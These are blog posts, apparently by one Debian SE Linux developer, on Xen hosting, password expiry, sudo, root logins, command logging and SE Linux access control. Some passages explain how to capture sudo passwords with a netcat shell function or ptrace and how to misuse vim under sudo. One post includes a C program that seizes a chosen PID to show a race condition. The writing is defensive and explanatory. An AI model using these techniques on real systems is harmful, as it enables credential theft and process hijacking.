1

Play Machine Online Again with Xen 4.0

My SE Linux Play Machine [1] has been offline for almost a month (it went offline late May 30 and has just gone online again). It’s the sort of downtime that can happen when you use Debian/Unstable.

For a while I’ve been using a HP E-PC (a SFF desktop system with 256M of RAM and a P3-800 CPU) to run my SE Linux Play Machine. I run it under Xen to make it easier for me to watch what happens. I’ve had some problems with increased memory use in the Xen Dom0 in Squeeze [2]. The latest installment of the memory problems is when I discovered that I can’t run two copies of tcpdump (for tracing separate interfaces) at once on a Xen Dom0 that has ~110M of RAM – this seems unreasonable, I’m sure that back when a big server had 128M of RAM I could have done such things! So now I’m using a Thinkpad T20 with 512M of RAM for my new SE Linux Play Machine, it uses less power than most systems (probably even less than the HP E-PC) and is very quiet.

I was forced to install on a new system when I broke my GRUB configuration. GRUB-2 in Debian currently has no support for generating a configuration that will boot a Xen Dom0. You can manually edit the GRUB configuration to get this working, but if you get it wrong then you can make GRUB not even display a prompt and force a reinstall (as I did). As an aside it would be really handy if someone would create a CD or USB bootable image that does nothing but install GRUB. Such an image would ideally allow replacing the configuration of an existing GRUB, overwriting an existing GRUB installation (all files in /boot/grub get replaced), or formatting a spare partition (default swap space) and installing GRUB there.

My current solution to the GRUB problems is to use the old version of GRUB in the grub-legacy package. The old version of GRUB has always done everything I want so I don’t seem to be missing anything by not using the new version. I’m happy to refrain from using Ext4 for /boot and have no desire to have /boot on an LVM volume.

Most of the month of down-time for my Play Machine was caused by bugs in the SE Linux policy I’m developing for Squeeze, while they weren’t difficult bugs I haven’t had much time to work on them consistently. I’m still running the Play Machine on Lenny, but the Dom0 is running Unstable.

New SE Linux Policy for Squeeze

I have just uploaded refpolicy version 0.2.20100524-1 to Unstable. This policy is not well tested (a SE Linux policy package ending in “-1” is not something that tends to work well for all people) and in particular lacks testing for Desktop environments. But for servers it should work reasonably well.

I expect to have a better version uploaded before this one gets out of Unstable.

Note that the selinux-policy-default package in this release lacks support for roles, it’s a targeted policy only. I plan to fix this soon.

11

Can you run SE Linux on a Xen Guest?

I was asked “Can you run SELinux on a XEN guest without any problem?“. In a generic sense the answer is of course YES, Xen allows you to run Linux kernels with all the usual range of features and SE Linux isn’t a particularly difficult feature to enable. I do most of my SE Linux development and testing on virtual machines and until recently I didn’t have any hardware suitable for running KVM, so in the last few years I’ve done more SE Linux testing on Xen than on non-virtual machines. My SE Linux Play Machine [1] (which will be online again tomorrow) is one SE Linux system running under Xen.

But the question was asked in the context of my blog post comparing the prices of virtual hosting providers [2], which changes things.

Both Linode and Slicehost (the two virtual hosting providers that my clients use) provide kernels without SE Linux support, the command “grep selinux /proc/filesystems” (which is the easiest way to test for SE Linux support) gives no output. I am not aware of any other virtual hosting company that provides SE Linux support.

If anyone knows of a virtual hosting company that runs Xen or KVM virtual machines with SE Linux support then please let me know, I’ll write a blog post comparing such companies if there are some.

For the people who work at ISPs: If your company supports SE Linux virtual machines then I would be happy to review your service, just give me a free DomU for a couple of weeks so I can test it out. If your company is considering offering such virtual machines then I would be happy to have a confidential discussion about the issues that you will face, while I am available for paid consulting work in this area I am more than happy to spend an hour or two helping a company that’s going to help support my favorite free software project without expecting to be paid. But I have to note that if a dozen hosting companies happen to want advice I won’t be able to provide two hours of free advice to each of them.

I think that there is an unsatisfied market demand for SE Linux virtual machines. I don’t expect all virtual hosting companies to support it in the near future, but this will make it more profitable for those that do. If for the sake of discussion we assume that 5% of sysadmins who are making purchasing decisions regarding virtual servers really want to have SE Linux support and if 5% of virtual hosting companies were to offer such support, then those hosting companies would almost double their market share as a result of supporting SE Linux. It’s the usual economic factors relating to small companies that profit from providing good support for the needs of a minority of customers.

4

Should Passwords Expire?

It’s widely regarded that passwords should be changed regularly. The Australian government declared last week the “National Cyber Security Awareness Week” [1] and has published a list of tips for online security which includes “Get a stronger password and change it at least twice a year“.

Can a Password be Semi-Public?

Generally I think of a password as being either secret or broken. If a password is known to someone other than the sysadmin and the user who is authorised to use the account in question then you have potentially already lost all your secret data. If a password is disclosed to an unauthorised person on one occasion then merely changing the password is not going to do any good unless the root cause is addressed, otherwise another anothorised person will probably get the password at some future time.

Hitachi has published a good document covering many issues related to password management [2]. I think it does a reasonable job of making sysadmins aware of some of the issues but there are some things I disagree with. I think it should be used as a list of issues to consider rather than a list of answers. The Hitachi document lists a number of ways that passwords may be compromised and suggests changing them every 60 to 90 days to limit the use of stolen passwords. This seems to imply that a password is something that’s value slowly degrades over time as it’s increasingly exposed.

I think that the right thing to do is to change a password if you suspect that it has been compromised. There’s not much benefit in having a password if it’s going to be known by unauthorised people for 89 days before being changed!

Fundamentally a password is something that can have it’s value rapidly drop to zero without warning. It doesn’t wear out.

Why are terms such as Three Months used for Maximum Password Ages?

The Hitachi document gives some calculations on the probability of a brute-force attack succeeding against a random password with 90 days of attacking at a rate of 100 attempts per second [2]. I think that if a service is run by someone who wouldn’t notice the load of 100 attempts per second then you have bigger security problems than the possibility of passwords being subject to brute-force attacks. Also it’s not uncommon to have policies to lock accounts after as few as three failed login attempts.

Rumor has it that in the early days of computing when the hashed password data was world readable someone calculated that more than 3 months of CPU time on a big computer would be needed to obtain a password by brute-force. But since then the power of individual CPUs has increased dramatically, computers have become cheap enough that anyone can easily gain legal access to dozens of systems and illegal access to a million systems, and it has become a design feature in every OS that hashed passwords are not readable by general users. So the limiting factor is to what degree the server restricts the frequency of password guesses.

I don’t think that specifying the minimum password length and maximum password age based on the fraction of the key space that could be subject to a brute-force attack makes sense.

I don’t think that any attempt to make an industry-wide standard for the frequency of password changes (as the government is trying to do) makes sense.

Can there be a Delay between a Password being Compromised and being Used by an Attacker?

Hypothetically speaking, if a password was likely to be compromised (EG by having the paper it was written on lost or stored insecurely) for some time before an attacker exploited it, then if the password was changed during that time period it could solve the problem. For example when a company moves office there is the possibility of notepaper with passwords to be lost. So if the sysadmin caused every user password to expire at the time of the move then a hostile party would be unable to gain access.

Another possibility is the theft of backup tapes that contain the list of unencrypted passwords. If users change their passwords every three months then the theft of some four month old backup tapes will be less of a problem.

Another possibility concerns the resale of old computers, phones, and other devices that may contain passwords. A reasonably intelligent user won’t sell their old hardware as soon as the replacement device arrives, they will want to use the new device for some time to ensure that it works correctly. If passwords expire during this trial period with the new device then passwords stored in the old device won’t have any value. The down-side to this idea is that people probably sell their old gear fairly quickly and making passwords expire every two weeks would not be accepted well by the users.

It seems to me that having bulk password changes (all passwords for one user or for one company) based on circumstances that lead to potential insecurity would do more good than changing passwords at a fixed schedule.

How are Passwords typically Compromised?

Dinei Florêncio and Cormac Herley of Microsoft Research and Baris Coskun of Brooklyn Polytechnic University wrote a paper titled “Do Strong Web Passwords Accomplish Anything?” [3] which discusses this issue. The first thing that they note is that nowadays passwords are most commonly compromised by phishing and keylogging. In those cases passwords are typically used shortly after they are stolen and the strength of a password never does any good. That paper suggests that banks should use stronger user-names rather than stronger passwords to combat the threat of bulk brute-force attacks.

Can a Password Last Forever?

If a password is entered in a secure manner, authenticated by a secure server, and all network links are encrypted or physically protected then there should never be a need to change it.

Of course nothing is perfectly secure, so for some things with minimal short-term value or which can be used without anyone noticing there is a benefit in changing the password. But in the case of Internet banking if a hostile party gets your login details then you will probably know about it in a few days when the bank calls you about the unusual transactions from foreign countries – long before a 90 day password change schedule would have done any good.

Maybe one of the issues determining whether a password should be changed regularly is whether an attacker could use long-term read-only access to gain some benefit. Being able to read all the email someone received for a year could be a significant benefit if that person was a public figure, and there’s usually no way for an ISP customer to know that someone else is downloading all their mail via POP or IMAP.

Should a Password be the only Authentication Method?

It is generally agreed that an authenitcation method should ideally involve something you have plus something you know. That means a password and a physical device such as a smart card, token with a changing sequential password, or a key such as a Yubikey [4]. If the physical device can’t be cloned (through some combination of technical difficulty and physical access control) then it significantly improves security. When a physical device is used the purpose of the password is merely to stop someone who steals the physical device from being immediately exploit everything – the password only has to be strong enough to keep the accounts secure until a new token can be issued.

The combination of something you have and something you know is very strong. Having a physical token stored on the desk next to the PC that is used for logging in provides a significant benefit, then an attacker needs to break in to the house and can’t sniff the password by compromising the PC remotely.

Conclusion

In all aspects of security you need to consider what threats you face. If an attacker is likely to launch an immediate noisy attack (such as transferring the maximum funds out of an Internet banking account) then changing the password regularly won’t do any good. If a subtle long-term attack is expected then changing the password can do a lot of good – but a physical token is the ideal if the account is valuable enough.

But to put things in to perspective, it’s technically possible to use a mobile phone camera at close range (or a SLR with a big lens at long range) to take a photo of keys that allow reproducing them. But this hasn’t stopped people from carrying their house keys in an obvious manner that permits photography or leaving them on their desk at work. Also I’ve never heard of anyone routinely changing the door locks in case a hostile party might have got a key – although I’m sure that such practices are common in highly secure locations. Few people even take their house keys off the key-ring when they have their car serviced!

Related Posts

Defense in Depth and Sudo – when using sudo can increase security and when it can’t.
Logging Shell Commands – how to log what the sysadmin does and what benefits that provides you, it doesn’t help if the sysadmin is hostile.
Logging in as Root – should you login directly as root?

6

Defense in Depth and Sudo

My blog post about logging in as root and whether sudo provides any benefit [1] got some interest on Redit. In the Reddit comments on my post [2] there are a lot of strange things. One interesting comment was to suggest that logging in as non-root provided “defense in depth”.

The NSA is credited with inventing the term “Defense in Depth” as applied to the computer industry, they have a PDF that gives an overview of the concept [3]. It seems that Defense in Depth is all about having multiple different layers of security, firewalls, IDS/IPS, passwords, PKI, etc. Entering the same password twice (once to login and once to run sudo – which seems to be a fairly typical configuration of sudo) hardly seems to count.

Can using sudo provide Defense in Depth benefits?

With a typical configuration the use of sudo provides no real protection. The user either enters their own password or the root password to gain full root access, in either case the attacker can exploit their session and get the password. A session exploit can be easily arranged by creating a shell function or alias that makes sudo run something else (such as using netcat to send the password out over the network).

One way of making this sort of attack more difficult is to make root own the user home directory, files such as ~/.login that are used by the user shell, the ~/.ssh directory and the ~/.ssh/authorized_keys file. This way a hostile party can’t change the configuration, so a successful attack has to involve a long running process that uses ptrace to intercept the shell and divert an attempt to run sudo.

If the non-root user is prevented from using ptrace then things start to become a little more difficult for the attacker. In some quick tests I was able to capture about half the data through messing with /proc/X/fd/0 and /proc/X/fd/1 for a target process, but it seems that it would be difficult to get an entire password that way. To disable ptrace you could compile a kernel without ptrace support, use a SE Linux policy that prevents prevent ptrace access for the sessions in question, or make the user’s shell SETGID.

If the root account and the account used for su or sudo use different authentication methods, where the options include ssh authorized keys, password, and security token (maybe both password and token for the root account) then it does seem that it would provide some Defense in Depth benefits.

sudo can be used to only permit executing certain commands. While this is a real security benefit it doesn’t allow full sysadmin work, merely delegating some portions of operations to people who don’t have full sysadmin rights. As someone needs to have full access to fix any problem that might occur on the machine someone needs to have access to run any command as root. So while sudo is great for providing limited administrative access to certain junior people, it’s not going to stop an attack on a member of the sysadmin team.

Conclusion

In a typical sudo configuration the non-root account is configured in a default Unix manner (with the user having ownership of their home directory). The user who logs in to that account controls it’s environment through .login and other scripts, so sudo doesn’t gain anything.

In a typical configuration ptrace is enabled so even if the critical environment files can’t be modified by a hostile party they can get the same result through ptrace. Admittedly using a SETGID shell is not going to be difficult to implement after you have changed the ownership of the home directory.

If you have a configuration where ptrace is not available and the non-root user can’t modify their own profile files then it starts to become difficult for an attacker. If root authentication requires using a security token such that every login uses a different code and the code expires rapidly then it becomes even more difficult for an attacker.

But for all configurations that are close to the default for every OS that I’ve ever used none of these conditions hold. Also none of those conditions held for any of the systems I’ve been employed to use which were configured to require su or sudo for root access.

As it seems that most sudo configurations don’t provide any extra security, and that auditing the actions of the sysadmin can be better done in other ways (such as the Bash 4.1 syslog feature) [4] it seems that for the vast majority of systems sudo doesn’t provide a benefit.

The fact that sudo could provide a benefit if configured in a way that is quite different to all the defaults and the ways that it is typically used is worth noting. I’m not going to argue with anyone who wants to configure their systems in such a manner and who believes that they need to do so. But anyone who thinks that sudo is the only way to go because the Ubuntu default configuration does it really needs to investigate the issues. Remember that blind faith in the security choices of other people can be a security problem.

4

Logging Shell Commands

In response to my previous post about logging in directly as root [1] it was suggested that using sudo is the only way to log the commands that are entered as root. One reason for doing this is if you don’t trust the people who are granted root access and you want to log all commands to a remote server that is run by different people. I wonder whether it is really possible to run systems with untrusted sysadmins, if someone can apply patches etc then they can surely install a trojan and then wait a while before activating it to make things more difficult for anyone who is analysing the logs.

One of the many issues is that even the restricted version of vim permits the :r and :w commands, so one could start vim from sudo with an innocuous file as the target of the edit operation and then read and write some critical file such as /etc/shadow. I expect that someone has written an editor which has a restricted mode that doesn’t allow reading/writing files other than the one specified on the command-line, and if not it surely wouldn’t be difficult to patch vim (or your favorite editor) to have such a mode of operation. But there are always other programs that can access files other than the ones specified on their command-line. It seems that using the auditctl interface to log access to certain critical files (EG read access to /etc/shadow and write access to everything under /etc, /bin, /sbin, and /usr) would be a necessary part of an effective auditing strategy and that sudo would only comprise a small part of a useful configuration.

There are other viable ways of logging everything that is done as root which offer benefits over sudo.

Ways of Logging Shell Commands

The Korn shell supports doing all the logging you might desire as part of a shell function [2].

Bash can have a similar shell function to do the logging, but when a command is entered the previous command is logged [3], this means that any single bash command that unsets this will never be logged. It might be possible to solve this if you know more about Bash than I do. I wonder if the Korn shell function has the same issue. This is still probably useful for some situations when you want to track what honorable sysadmins do, but of little benefit for tracking hostile sysadmins – (tracking hostile sysadmins is actually possible).

You can put code in a file such as /etc/bash.bash_logout to log the commands elsewhere, but even trivial things such as “kill -9 $$” can defeat that so it’s only useful when the sysadmin is trusted.

The Sudoshell project exists to log all data that is entered in a shell [3]. One deficiency of this for the people who don’t trust the root user is that it logs the data to files on disk, but it shouldn’t be difficult to rewrite sudoscriptd to write directly to another machine over the network. Also one benefit of this for auditing is that it captures all the output of the commands as well (which can be a little inconvenient to decipher when curses programs are run. The web site also describes some of the problems with trying to use sudo directly for everything (such as pipelines).

If you compile Bash version 4.1 with the SYSLOG_HISTORY macro enabled (which can be done by editing the file config-top.h) then it will log all commands to syslog. RootShell.be has a short post about this which mentions the security issues, some commands take passwords as parameters and these passwords could be exposed to the network [5]. Of course the best option is to just avoid such commands. Thanks to Chris Samuel for pointing out the Bash logging feature.

Conclusion

If you use sudo for auditing root access then you lose some shell functionality. Sudo also only logs the commands that are executed – you don’t get logging of output. It seems that depending on the exact needs either a modified version of Sudoshell or the logging that can be compiled in to Bash would be the way to go depending on the exact requirements. The main benefit of using sudo for logging would be that some distributions of Linux are configured that way by default – but it seems unlikely that someone would go to the effort of running a separate logging server that the regular sysadmin team can’t touch and then configure their servers in a default manner.

6

Securely Killing Processes

Joey Hess wrote on Debian-devel about the problem of init scripts not doing adequate checks before using the data from a PID file under /var/run to determine which process to kill [1]. Unfortunately that still doesn’t quite solve the problem, there is still the issue of a race condition causing a process to die while you are doing the checks and then be replaced by another process.

Below I have included the source code to a little program that will repeatedly fork() until it finds a particular PID and then have it’s child call sleep(). So you can run a command such as “kill -9 1234 ; ./a.out 1234” and then have this program take over the PID 1234.

From testing with this it seems that when you have a shell with it’s current working directory as /proc/1234 then once process 1234 is killed the current directory is empty, “ls -l” returns 0 entries. This isn’t surprising, it’s the standard Unix behavior when the working directory is removed.

So if a program (or even a shell script) changes directory to /proc/1234 it can then verify all attributes of the process (it’s CWD, it’s root directory, the executable used to run it, it’s UID, GID, supplemental groups, it’s SE Linux context, and lots of other things all atomically. The only possibility for confusion is that a process might execute a SETUID or SETGID program or a program that has a label which triggers a SE Linux domain transition. It might also change some attributes without executing a new process, for example by using the setuid(), setgid(), setgroups(), or other similar system calls. For the purposes of killing a process I don’t think that the possibility of it changing it’s own attributes or executing a new program are serious problems, if you want to kill a process then you probably want to kill it after it has called setuid() etc.

It seems to me that it would be useful to have a file named /proc/PID/signal (or something similar) to which you could write a number and then have the kernel send the signal in question to that process. So the commands “kill -9 1234” and “echo 9 > /proc/1234/signal” would give the same result. But you could run the command “cd /proc/1234” and then some time later you could run “echo 9 > signal” and know that you would kill the original process 1234 if it was still running and not some other process that replaced it.

What do you think? Is this worthy of adding a new feature to the proc filesystem?

The Source

Run the following program with a single parameter which is the PID that you want it to take. It will keep looping through the PID space until it gets the one you specify, if the one you specify isn’t available (EG you give it “1” as a parameter) then it will run forever. It will take some time to get a result on a slower system. On my P3-900MHz test system it took up to 72 seconds to get a result.

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>

int main(int argc, char **argv)
{
  if(argc != 2)
  {
    printf("Specify the desired PID on the command-line\n");
    return 1;
  }
  pid_t wanted = (pid_t)atoi(argv[1]);
  int rc;
  int status;
  while((rc = fork()) != wanted && rc != 0)
  {
    if(rc == -1)
    {
      printf("fork error\n");
      return 1;
    }
    if(wait(&status) == -1)
      printf("wait error\n");
  }
  if(rc == 0)
  {
    if(getpid() == wanted)
    {
      printf("Got pid %d, sleeping\n", wanted);
      sleep(200);
    }
    return 0;
  }
  wait(&status);
  return 0;
}

Can SE Linux Implement Traditional Unix Users and Groups?

I was asked by email whether SE Linux could implement traditional Unix users and groups.

The Strictly Literal Answer to that Question

The core of the SE Linux access control is the domain-type model where every process has a domain and every object that a process can access (including other processes) has a type. Domains are not strongly differentiated from types.

It would be possible to create a SE Linux policy that created a domain for every combination of UID and GID that is valid for a user shell given that such combinations are chosen by the sysadmin who could limit them to some degree. There are about 2^32 possible UIDs and about 2^32 possible GIDs, as every domain is listed in kernel memory we obviously can’t have 2^64 domains, but we could have enough to map a typical system that’s in use. Of course the possible combinations of supplemental groups probably makes this impossible for even relatively small systems, but we can use a simpler model that doesn’t emulate supplemental groups.

For files there are more possible combinations because anyone who is a member of a group can create a SETGID directory and let other users create files in it. But in a typical system the number of groups is not much greater than the number of users – the maximum number of groups is typically the number of users plus about 60. So if we had 100 users then the number of combinations of UID and GID would be something like 100*(100+60)=16,000 – it should be possible to have that many domains in a SE Linux policy (but not desirable).

Then all that would be needed is rules specifying that each domain (which is based on a combination of UID and GID) can have certain types of access to certain other types based on them having either the same UID or the same GID.

Such a policy would be large, it would waste a lot of kernel memory, it would need to be regenerated whenever a user is added, and it’s generally something you don’t want to use. No-one has considered implementing such a policy, I merely describe it to illustrate why certain configuration options are not desirable. The rest of this post is about realistic things that you can do with SE Linux policy and how it will be implemented in Debian/Squeeze.

My previous post titled “Is SE Linux Unixish?” addresses this issue at a more conceptual level and also considers MAC vs DAC [1].

The History of mapping Unix Accounts to SE Linux Access Control

In the early releases of SE Linux (long before it was included in Fedora) every user who could login to a system needed to have their user-name compiled into the policy. The policy specified which roles the user could access, the roles specified which domains could be accessed, and therefore what the user could do. The identity of files on disk was used for two purposes, one was logging (you could see who created a file) and the other was a permission check for the SE Linux patched version of Vixie cron which would not execute any command on behalf of a user unless the identity on the crontab file in the cron spool matched the identity used to run it – this is an analogy of the checks that Vixie cron makes on the Unix UID of the crontab file (some other cron daemons do fewer checks).

Having to recompile policy source every time you added a user was annoying. So a later development was to allow arbitrary mappings between Unix account names and SE Linux Identities (which included a default identity) and another later development was to have a utility program semanage to map particular Unix account and group names to SE Linux identities. This was all done years ago. Fedora Core 5 which was released in 2006 had the modular policy which included these features (apart from mapping Unix groups to SE Linux identities which was more recent).

Fedora Core 5 also introduced MCS which was comprised of a set of categories that a security context may have. The sysadmin would configure the set of categories that each account would have.

A recent development has been a concept named UBAC (User Based Access Control) which basically means that a process running directly on behalf of a regular user (IE with a SE Linux identity that’s not system_u) can only access files that have an identity of system_u or which have the same identity as the process. This means that you can only access your own files or system files – not files of other users which may have inappropriate Unix permissions. So for example if a user with a SE Linux identity of “john” gives their home directory the Unix permission mode of 0777 then a user with a SE Linux identity of “jane” can’t access their files. Of course this means that if you have a group of people working together on a project then they probably need to all have the same Identity and in practice you would probably end up with everyone having the same identity. I’ve given up on the idea of using UBAC in Debian.

The Current Plan for Users and SE Linux Access Control in Debian

My plan is to have things work in Squeeze in much the same way as in Lenny.

You have a SE Linux identity assigned to a login session and everything related to it (including cron jobs) based on the Unix account name or possibly the Unix group name (if there are login entries for both the user-name and the group-name then the user-name entry has precedence). The mapping between Unix accounts and SE Linux identities is configured by the sysadmin and SE Linux identities don’t matter much for the Targeted configuration (which is what most people use).

The identity determines which roles may be used and also has a limit on the MCS categories. The MCS categories are also specified in the login configuration which has to be a sub-set of the categories used by the identity record.

So for example the following is the output of a couple of commands run on a Debian/Unstable system. They show that the “test” Unix account is assigned a SE Linux identity of “staff_u” and an MCS range of “s0-s0:c1” (this means it creates files by default at level “s0” and can also write to other files at that level, but can also have read/write access to files at the level “s0:c1”). The “staff_u” identity (as shown in the output of “semanage user -l” can be used with all categories in the set “s0:c0.c1023” where the dot means the set of categories from c0 to c1023 inclusive) but in the case of the “test” user only one category will be used. The “test” group however (as expressed with “%test”) is given the identity “user_u” and is not permitted to use any categories.

# semanage login -l
Login Name    SELinux User    MLS/MCS Range            
%test         user_u          s0                       
__default__   unconfined_u    s0-s0:c0.c1023           
root          unconfined_u    s0-s0:c0.c1023           
system_u      system_u        s0-s0:c0.c1023           
test          staff_u         s0-s0:c1               

# semanage user -l
             Labeling   MLS/       MLS/                          
SELinux User Prefix     MCS Level  MCS Range         SELinux Roles
root         sysadm     s0         s0-s0:c0.c1023    staff_r sysadm_r system_r
staff_u      staff      s0         s0-s0:c0.c1023    staff_r sysadm_r
sysadm_u     sysadm     s0         s0-s0:c0.c1023    sysadm_r
system_u     user       s0         s0-s0:c0.c1023    system_r
unconfined_u unconfined s0         s0-s0:c0.c1023    system_r unconfined_r
user_u       user       s0         s0                user_r

I hope to get the policy written to support multiple user roles in time for the release of Squeeze. If I don’t make it then I will put such a policy on my own web site and try to get it included in an update. The policy currently basically works for a Targeted configuration where the users are not confined (apart from MCS).

How MMCS Basically Works

The vast majority of SE Linux users run with the MCS policy rather than the MLS policy. For Debian I have written a modified version of MCS that I call MMCS. MMCS is mandatory (you can’t relabel files to escape it) and it prevents write-down.

If a process has the range s0-s0:c1,c3 then it has full access to files labelled as s0, s0:c1, s0:c3, and s0:c1,c3 – and any files it creates will be labeled as s0.

If a process has the range s0:c1-s0:c1,c3 then it has read-only access to files labelled as s0 and s0:c3 and read-write access to files labelled as s0:c1 and s0:c1,c3. This means that any secret data it accesses that was labelled with category c1 can’t be leaked down to a file that is not labelled with that category.

Now MCS currently has no network access controls, so there’s nothing stopping a user from using scp or other network utilities to transfer files. But that’s the way with most usable systems. I don’t think that this is necessarily a problem, the almost total lack of network access controls in a traditional Unix model doesn’t seem to concern most people.

Now to REALLY Answer that Question

SE Linux is a Mandatory Access Control (MAC) system, this makes it inherently different to a Discretionary Access Control (DAC) system such as traditional Unix access controls.

Unix permissions are based on each file having a UID, a GID, and a set of permissions and each process having a UID, a GID, and a set of supplementary GIDs. If a user runs a setuid or setgid program then the process will have extra privileges. It also has a lot of stuff that most people aren’t aware of such as real vs effective UIDs, the tag bit, setgid directories, and lots more – including some quite arbitrary things like making ports <1024 special.

SE Linux is based on every object (process, file, socket, etc) having a single security label which includes an identity, a role, a type, and a sensitivity label (MCS categories or an MLS range). There is no support for an object to have more than one label. The SE Linux equivalent to setuid/setgid files is a label for a file which triggers a domain transition when it’s executed. This differs from setuid files in that the domain transition is complete (the old privileges can’t be restored) and the transition is generally not to a strict super-set of the access (usually a different sub-set of possible access and sometimes to lesser access).

These differences are quite fundamental. So really SE Linux can’t implement traditional Unix access control. What SE Linux is designed to do is to provide a second layer of defense and to also provide access controls that have different aims than that of Unix permissions – such as being mandatory and implementing features such as MLS.

19

Logging in as Root

Martin Meredith wrote a blog post about logging in as root and the people who so strongly advocate against it [1]. The question is whether you should ssh directly to the root account on a remote server or whether you should ssh to a non-root account and use sudo or su to gain administrative privileges.

Does sudo/su make your system more secure?

Some years ago the administrator of a SE Linux Play Machine used the same home directory for play users to login as for administrative logins as for his own logins – he used newrole to gain administrative access (like su or sudo but for SE Linux).

His machine was owned by one of his friends who created a shell function named newrole in one of his login scripts that used netcat to send the administrative password out over the net. He didn’t immediately realise that this was a problem until his friend changed the password and locked him out! This is one example of a system being 0wned due to having the double-authentication – of course if he had logged in directly with administrative privs while using the same home directory that the attacker could write to then he would still have lost but the attacker would have had to do a little more work.

When you login you have lots of shell scripts run on your behalf which have the ability to totally control your environment, if someone has taken over those scripts then they can control everything you see, when you think you run sudo or something they can get the password. When you ssh in to a server your security relies on the security of the client end-point, the encryption of the ssh protocol (including keeping all keys secure to prevent MITM attacks), and the integrity of all the programs that are executed before you have control of the remote system.

One benefit for using sshd to spawn a session without full privileges is in the case where you fear an exploit against sshd and are running SE Linux or some other security system that goes way beyond Unix permissions. It is possible to configure SE Linux in the “strict” configuration to deny administrative rights to any shell that is launched directly by the sshd. Therefore someone who cracks sshd could only wait until an administrator logs in and runs newrole and they wouldn’t be able to immediately take over the system. If the sysadmin suspected that a sshd compromise is possible then a sysadmin could login through some other method (maybe visit the server and login at the console) to upgrade the sshd. This is however a very unusual scenario and I suspect that most people who advocate using sudo exclusively don’t use a SE Linux strict configuration.

Does su/sudo improve auditing?

If you have multiple people with root access to one system it can be difficult to determine who did what. If you force everyone to use su or sudo then you will have a record of which Unix account was used to start the root session. Of course if multiple people start root shells via su and leave them running then it can be difficult to determine which of the people who had such shells running made the mistake – but at least that reduces the list of suspects.

If you put “PermitUserEnvironment yes” in /etc/ssh/sshd_config then you have the option of setting environment variables by ssh authorized_keys entries, so you could have an entry such as the following:

environment=”ORIG_USER=john@example.com” ssh-rsa AAAAB3Nz[…]/w== john@example.com

Then you could have the .bashrc file (or a similar file for your favorite shell) have code such as the following to log the relevant data to syslogd:
if [ "$SSH_TTY" = "" ]; then
  logger -p auth.info "user $ORIG_USER ran command \"$BASH_EXECUTION_STRING\" as root"
else
  logger -p auth.info "user $ORIG_USER logged in as root on tty $(tty)"
fi

I think that forcing the use of su or sudo might improve the ability to track other sysadmins if the system is not well configured. But it seems obvious that the same level of tracking can be implemented in other ways with a small amount of effort. It took me about 30 minutes to devise the above shell code and configuration options, it should take people who read this blog post about 5 minutes to implement it (or maybe 10 minutes if they use a different shell or have some other combination of Bash configuration that results in non-obvious use of initialisation scripts (EG if you have a .bash_profile file then .bashrc may not be executed).

Once you have the above infrastructure for logging root login sessions it wouldn’t be difficult to run a little script that asks the sysadmin “what is the purpose for your root login” and logs what they type. If several sysadmins are logged in at the same time and one of them describes the purpose of their login as “to reconfigure LDAP” then you know who to talk to if your LDAP server stops working!

Should you run commands with minimum privilege?

It’s generally regarded that running each command with the minimum privilege is a good idea. But if the only reason you login to a server is to do root tasks (restarting daemons, writing to files that are owned by root, etc) then there really isn’t a lot of potential for achieving anything by doing so. If you need to use a client for a particular service (EG a web browser to test the functionality of a web server or proxy server) then you can login to a different account for that purpose – the typical sysadmin desktop has a dozen xterms open at once, using one for root access to do the work and another for non-root access to do the testing is probably a good option.

Can root be used for local access?

Linux Journal has an article about the distribution that used to be known as Lindows (later Linspire) which used root as the default login for desktop use [2]. It suggests using a non-root account because “If someone can trick you into running a program or if a virus somehow runs while you are logged in, that program then has the ability to do anything at all” – of course someone could trick you into running a program or virus that attempts to run sudo (to see if you enabled it without password checks) and if that doesn’t work waits until you run sudo and sniffs the password (using pty interception or X event sniffing). The article does correctly note that you can easily accidentally damage your system as root. Given that the skills of typical Linux desktop users are significantly less than those of typical system administrators it seems reasonable to assume that certain risks of mistake which are significant for desktop users aren’t a big deal with skilled sysadmins.

I think that it was a bad decision by the Lindows people to use root for everything due to the risk of errors. If you make a mistake on a desktop system as non-root then if your home directory was backed up recently and you use IMAP or caching IMAP for email access then you probably won’t lose much of note. But if you make a serious mistake as root then the minimum damage is being forced to do a complete reinstall, which is time consuming and annoying even if you have the installation media handy and your Internet connection has enough quota for the month to complete the process.

Finally there are some services that seek out people who use the root account for desktop use. Debian has some support channels on IRC [3] and I decided to use the root account from my SE Linux Play Machine [4] to see how they go. #debian has banned strings matching root. #linpeople didn’t like me because “Deopped you on channel #linpeople because it is registered with channel services“. #linuxhelp and #help let me in, but nothing seemed to be happening in those channels. Last time I tried this experiment I had a minor debate with someone who repeated a mantra about not using root and didn’t show any interest in reading my explanation of why root:user_r:user_t is safe for IRC.

I can’t imagine that good the #debian people expect to gain from denying people the ability to access that channel with an IRC client that reports itself to be running as root. Doing so precludes the possibility of educating them if you think that they are doing something wrong (such as running a distribution like Lindows/Linspire).

Conclusion

I routinely ssh directly to servers as root. I’ve been doing so for as long as ssh has been around and I used to telnet to systems as root before that. Logging in to a server as root without encryption is in most cases a really bad idea, but before ssh was invented it was the only option that was available.

For the vast majority of server deployments I think that there is no good reason to avoid sshing directly as root.

UBAC and SE Linux in Debian

A recent development in SE Linux policy is the concept of UBAC (User Based Access Control) which prevents SE Linux users (identitied) from accessing each other’s files.

SE Linux user identities may map 1:1 to Unix users (as was required in the early versions of SE Linux), you might have unique identities for special users and a default identity for all the other users, or you might have an identity per group – or use some other method of assigning identities to groups.

The UBAC constraints in the upstream reference policy prevent a process with a SE Linux identity other than system_u from accessing any files with an identity other than system_u. So basically any regular user can access files from the system but not other users and system processes (daemons) can access files from all users. Of course this is just one layer of protection, so while the UBAC constraint doesn’t prevent a user from accessing any system files the domain-type access controls may do so.

If you used a unique SE Linux identity for each Unix account then UBAC would prevent any user from accessing a file created by another user.

For my current policy that I am considering uploading to Debian/Unstable I have allowed the identity unconfined_u to access files owned by all identities. This means that unconfined_u is an identity for administrators, if I proceed on this path then I will grant the same rights to sysadm_u.

UBAC was not enabled in Fedora last time I checked, so I’m wondering whether there is any point in including it – I don’t feel obliged to copy everything that Fedora does, but there is some benefit in maintaining compatibility across distributions.

For protecting users from each other it seems that MCS (which is Mandatory in the Debian policy) is adequate. MCS allows a much better level of access control. For example I could assign categories c0 to c10 to a set of different projects and allow the person who manages all the projects to be assigned all those categories when they login. That user could then use the command “runcon -l s0:c1 bash” to start a shell for the purpose of managing files from project 1 and any file or process created by that command would have the category c1 and be prevented from writing to a file with a different category.

